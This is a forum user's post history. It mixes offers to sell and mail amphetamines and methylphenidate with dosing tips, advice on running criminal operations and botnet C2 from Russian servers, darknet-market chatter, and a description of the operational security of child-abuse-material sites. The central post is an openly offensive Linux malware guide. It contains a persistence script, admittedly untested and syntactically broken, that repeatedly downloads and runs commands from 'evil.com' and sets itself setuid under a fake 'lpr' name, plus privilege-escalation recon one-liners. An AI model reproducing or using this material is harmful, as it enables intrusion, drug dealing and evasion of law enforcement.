User Controls
Posts by Sophie
-
2021-11-15 at 8:39 PM UTC in good stims to help me concentrate for programming?I can send some fluoro amps over if you pay for shipping and the product, i don't have any supply at the moment. I can also ship over amp paste, vacuum sealed on the inside of an old HDD. I got loads of those. And i only need to make a phone call to get paste up to 100g, but that would be excessive for studying lmao. I got methylphenidate out the ass, if you pay for shipping i'll send some of those over for next to nothing.
-
2021-11-15 at 8:33 PM UTC in good stims to help me concentrate for programming?2-FMA, if you can source it. Coke isn't something i experience as a 'productivity drug'. Low dose Methylphenidate, or Ethylphenidate, the Ethyl variety should be dosed volumetrically as it's pretty potent. 5mg Ethylphenidate is a good dose to focus but still pretty 'speedy'.
Good thing about the fluoro amps is that you can smoke them, which allows you to calibrate for lack of a better term after each hit. -
2021-11-15 at 8:28 PM UTC in If one hacked a Russian bank from America...Yeah ^
I mentioned something along those lines in the other thread about AlphaBay 2.0 -
2021-11-15 at 6:34 PM UTC in If one hacked a Russian bank from America...You're better off pulling the reverse, run operations against anything and everyone from Russian based infrastructure.
-
2021-11-15 at 4:52 PM UTC in Sh/Bash Hellscripts. Implementations, Potential Limitations & DevI know this thread a little heavy on the theory behind it all, and requires some understanding of relatively low level Linux, which is why i set up the secure storage with the resources i mentioned above. If you're interested they're still available, all you need to do is send me a PM.
I'm still writing part two, even if interest in the subject at this level is limited, i find writing my thoughts out to be helpful in increasing my own understanding of the subject matter. As always, feel free to ask any questions regarding anything contained within this thread, or the previous one in the series. And feedback is appreciated as well.
If you read the OP you know i am working on a Framework that will be deployed through Docker that will have a number of unique and custom tools, that will help with the creation of Bash/Sh based malware components, payloads and more. It will also have a broad selection of third party tools for obfuscation, encoding, platform specific payload generation and a small library of exploits that come in source code, pre-compiled, and as shellcode or ASM, depending on the type of attack it will allow you to execute.
If you're not that big into the theory of it all, i am pretty sure you will appreciate the Docker Image as a powerful OffSec tool that will be easy to use. Complimentary tools might include reverse engineering utils and scripts/programs that assist in creating ROPGadgets and more. -
2021-11-15 at 4:02 PM UTC in Closing Arguments today in Rittenhouse trial.Also i think it's live right this instant BTW.
-
2021-11-15 at 3:59 PM UTC in Closing Arguments today in Rittenhouse trial.
-
2021-11-15 at 3:56 PM UTC in The Official NIS 2A ThreadHere's a question for all you freedom loving, patriotic Americans ITT, and i don't mean that in a patronizing manner in the slightest, i was wondering about a couple things ammunition related. I was reminded of it because Speedy was talking about tracers.
Now i know .50BMG comes in a broad variety in terms of rounds for specific purposes. The type of round is indicated by the color on the tip of the bullet. Black Tip indicates Armor penetrating round, red tip tracer round, blue tip incendiary and so on and so forth. I've seen rifles of lower caliber with a similar variety in round types. Although to the best of my knowledge the color coding scheme doesn't hold up in the same way as it does for the .50BMG.
Does it depend on the caliber? Or does it differ between manufacturers? It would seem to me, a good idea to color code the rounds that have certain effects all the same, so no matter what caliber you're shooting for instance a tracer round should always have a red tip.
Yet this doesn't seem to be the case, and i'd love to know why. -
2021-11-15 at 1:04 PM UTC in Closing Arguments today in Rittenhouse trial.If there is any justice left in the US of A the jury will acquit Kyle.
-
2021-11-15 at 12:58 PM UTC in Closing Arguments today in Rittenhouse trial.IDK when it starts exactly, but here's my prediction. The State is going to spin a yarn, and tell a story on how Kyle was provoking the people he shot, and the will emphasize that provocation nullifies self-defense. Which in Washington State Law it does. Then the defense will go over all the technicalities, and emphasize the evidence presented which shows clearly it was a case of self defense. However they will tell it in not an engaging manner and bore the jury.
Personally i hope the jury isn't intimidated by the fucking threats of riots and mayhem and has a basic understanding of the law, so they will acquit. If the Jury is compromised they may hand down a guilty verdict, and if they do i hope the Judge intervenes in some way. Not sure how, perhaps he can sentence Kyle to Time Served or whatever. unless there is a mandatory minimum.
Posting this here because in essence it's a political trial.
Free Kyle Rittenhouse, there will be riots, which is exactly why we need him. He's a top lad and did the right and honorable thing. What do you think is going to happen? -
2021-11-15 at 12:48 PM UTC in How often do you think about death?It depends on how dark my mood is for the day/week/month.
-
2021-11-15 at 12:42 PM UTC in Hey wintermute you’re a faggot
-
2021-11-15 at 12:36 PM UTC in A humble suggestion.Well, it's bump now, IDK if that's temporary. But i think your usertitle should have something to do with the fact you're Cree and something funny that combines with it, like excessive meth use or some such.
-
2021-11-15 at 12:23 PM UTC in betabay is back!!!!!
-
2021-11-15 at 12:22 PM UTC in betabay is back!!!!!
Originally posted by aldra that one might be because they're hosting in Eastern Europe and don't want to attract the attention of the authorities there
Good point. The way around that though, is prohibiting the sale of products to Russia, and from Russia. Russia's cyber crime laws only apply if it affects the Russian government. they don't care if you have a VPS there that's used in some kind of capacity as let's say a C2 server that controls a botnet that only operates in the US and Europe. Although they sometimes make exceptions for important European trading partners. -
2021-11-15 at 12:14 PM UTC in betabay is back!!!!!
Originally posted by the man who put it in my hood no russian stuff is kinda weird
For sure, at first i thought it might have something to do with the latest sanctions on Russia, but that was specifically intended for the import of Russian ammunition, so if they're not going to have firearms vendors that idea falls flat. So pretty weird indeed. -
2021-11-15 at 12:07 PM UTC in betabay is back!!!!!
Originally posted by aldra aside from contract killings, doxing and the trade of (not just discussion of) weapons, the 'banned items' aren't likely to attract any more heat than unrestricted trade of drugs and stolen financial information.
they're either moralising (which is a strange thing, historically, for a darkmarket to do) or they're the kind of thing a politician would be worried about being associated with if it comes out that it was a federally-run honeypot
Right. It might be interesting to note that all contract killing sites/DNM Services have historically been scams though. So you could chalk that one up to their anti-scammer policies. But a honeypot is still very much a possibility. -
2021-11-15 at 11:45 AM UTC in betabay is back!!!!!
Originally posted by aldra suspicious
Very much so. Most charitable interpretation i can give is that it's an attempt to decrease 'the heat'. Then again, IDK why you would do business in OffSec tooling and malware on anything other than a platform purposefully designed to deal in such things. At the very least they should have the option for users to privately contact Black hat 'service providers' and come to some agreement together, using the DNM's infrastructure but not have it out in the open.
Also I2P has been getting better, but i am not sure if by I2P Over Tor they mean running I2P protocol through the Tor Network, vice versa or just use I2P rather than Tor Network.
From reading the announcement they seem to be suggesting that they are working on a custom solution, being a new type of Network Entirely(Which would be a pretty huge undertaking) or a combination of existing technologies. To further decentralize i suppose they could federate parts of their infrastructure. And seeing as they are saying they want to create an overarching solution where new DNM's can use the new Network Architecture and individual vendors will be able to set up shops it sounds like they are looking to federate.
Personally i would give it a couple months and see how they are faring, if they come out with their own new secure type of network and related clients/overlay interface/bridges/proxies or what have you, those implementations need to be audited and reverse engineered to determine how secure they actually are.
If they are undertaking such a project they should open source it, because at the end of the day even if everything seems secure, having it closed source is akin to security through obscurity which isn't an effective method of securing something at all. What you want is the very design to secure and decentralized by it's very nature, so that even if you have all the source code, it doesn't matter who sees it or not because the system is built to only function in one way, that way being the most secure.
I have my doubts. And as long as they are expanding the staff there is always the chance that they will be infiltrated. Once that happens, internal security protocols with regards to OPSEC, and general counter intelligence can be observed and studied, once that happens it is only a matter of time unless they do it like the most 31337 CP sites. Not going to get into the weeds to much, but you need to pay an entrance fee in the form of original content, adhere to extremely strict OPSEC protocols like frequently changing usernames according to a theme and randomizing who gets which username, and using multiple PGP keys, that change with the username, according to a set. One lapse in discipline/judgement by an individual means immediate termination of the user account, invalidation of all their related keys etc.
Such a format can only be used to trade in digital goods however, like media, but the format works very well for OffSec Tooling and Services as well.
Anyway, my two cents. -
2021-11-08 at 11:15 PM UTC in Faking w9 formGot a copy of a valid w9 form? I'll tell you how hard it is to fake.
-
2021-11-08 at 7:50 PM UTC in Sh/Bash Hellscripts. Implementations, Potential Limitations & DevPreamble
Welcome to another edition of Sophie's Cyber Shenanigans. In this thread i want to take a more closer look at some of the things we discussed in this thread. Expand on the concept, and discuss some ideas related to it. Specifically on the potential of utilizing Sh/Bash as a universal solution for the development, deployment, and general operation of Malwares targeting *Nix.
I've been a bit obsessed the last 6 to 10 months with creating effective malware for *Nix. In part due to the fact a lot of web servers use Linux Distros for their day to day operations, IoT/Embedded devices, and the fact that the maturity of *Nix allows for a variety of setups. Not just for people interested in programming or security, but media development, networking solutions up to the enterprise level, and general use as a day to day OS.
As such I've done a lot more research into the feasibility of the concept by gathering resources that really take a deep dive approach to advanced shell scripting and Linux security in general. Before we move on from this rather long preamble i just wanted to mention that i set up a secure sharing platform, accessible by request, that you can use to download some of the resources i've been using. A couple things you can get from there are E-Books including Advanced Shellscripting in Bash, Advanced C for Unix, Linux Kernel Resources, documents related to how ELF and other *Nix executable formats work, Static Binaries, with source code and Makefiles, and a couple of PoCs. If you're interested in any of that send me a PM and i will give you access to the secure storage.
Linux Malware
Some stuff to consider.
Most people have a general understanding that Linux is less susceptible to Malware and compared to anything Microsoft puts out that is certainly the case, not to mention the fact that Black Hats tend to focus more on Windows because at the end of the day that's where the money is. In practical terms though, while no system is 100% secure any distro can be configured to be as secure as possible, and while there are enough utilities OSS and otherwise that help with that, it takes a certain amount of know-how in order to harden Linux and be able to parse and interpret all the data coming in from logging tools and the like. Of course an enterprise will have this figured out if they have a decent blue team and/or SOC with the proper playbooks and incident response teams.
Operations against specific enterprises should be conducted in a way that is tailored towards the enterprise and operational directive in question. That is not to say that Sh/bash based malware won't work but a sophisticated threat actor will use all the intel available to them to decide what is best for their particular scenario. The above is tangentially related to what this thread is about but it should give you a little bit of context. When i am talking about a universal solution in terms of Linux malware, engaging an enterprise is a little bit more nuanced. What i am proposing is a universal solution in terms compatibility with different distros and architectures. Which leads nicely into the following:
Let's take a common Linux Rootkit technique as an example. A lot those, use LD_PRELOAD to inject their own libraries and hook functions on the target system, this is possible because of dynamically linked executables. In plain English, the dynamically linked executables(ELF Files) essentially load one of the attackers libs when executed after being altered by the attacker specifying the LD_PRELOAD environment variable, which can change their behavior in wonderful and terrible ways. So far so good, you are not dependent on the libs specific to that system, if you're smart you write your rootkit in such a way that it affects or checks for both ELF32 and ELF64 files to cover your bases.
Writing a shell script, obfuscating it and having it run on the target machine will spare you the trouble though, because it will just invoke the utilities as they exist on the target machine.
As an interesting aside;
I have a tool that allows me to take a shell script i wrote, parse it, check the utils it invokes and automatically write out C source that will use the LD_PRELOAD method to change the libs the ELF files on the target machine uses in such a way that they will work as they are supposed to even if they differ from the same utils my machine would invoke. The C output i can then compile locally and ship off to any other Linux Box where it will run as if it were a static binary.
You could even run a shell script through the tool i mentioned, and have the compiled version write out an obfuscated shell script on the target machine and then execute that as an embedded payload.
If you're interested in reverse engineering and ELF Malware analysis you should definitely check the repo below out.
git clone https://github.com/ashalaginov/Linux-ELF-malware-static-analysis.git
Implementations
Your average linux distro is full of tools and utilities that are excellent for command and control operations, crypto ops, and all kinds of shenanigans. Below is an example i wrote of a shell script that checks a remote source every set interval of time, downloads a new script(Set of commands) and runs it
#!/usr/bin/env -S bash\_"umask\_700"\_-f
cd ~/.local/sbin 2>/dev/null 1>/dev/null || mkdir ~/.local/sbin 2>/dev/null 1>/dev/null
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
if [ -x $(which busybox) ]; then
buff_ops 'busybox' '--install ~/.local/sbin'
buff_ops 'chmod' '--recursive +xst . '
cat << EOF > ~/.local/sbin/lpr
#!/usr/bin/env -S bash\_"umask\_700"\_-f
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops './watch ' '-t -n 120 -e wget -nv -O https://evil.com/commands.sh | sh & '
EOF
chmod 4777 ~/.local/sbin/lpr
buff_ops './lpr'
fi
If i've made some mistakes regarding syntax, that's on me, i haven't had a chance to debug the above script yet.
Also instead of creating new dirs in a place we might not have permissions to do so, we could always use the /tmp directory as a temporary staging area.
For recon/enum regarding permissions simple one liners might be useful.
find / -perm 4000 2>/dev/null
find / -perm -o+w 2>/dev/null
An interactive shell will allow you to run this.
And those are just some of the examples i've been working on.
How this all ties together, how we might launch exploits in Asm or shellcode, and how we might compile such exploits in situ that is to say on the target machine, i'll leave up to PART 2 which i will post ITT. I'm on a schedule at the moment unfortunately. And this is about all the time i got for now.
Also, in Part 2 i'll tell you all about a framework i am developing that puts all this and more together to allow me and those that are interested, create complete Sh/Bash based malwares with relative ease. I will release this framework as a Dockerfile when it's done. It's going to be dope.
Anyway, in the mean time feel free to post some questions, correct me where i am wrong and leave some constructive criticism if you are so inclined. I'll be back later today to finish this up.
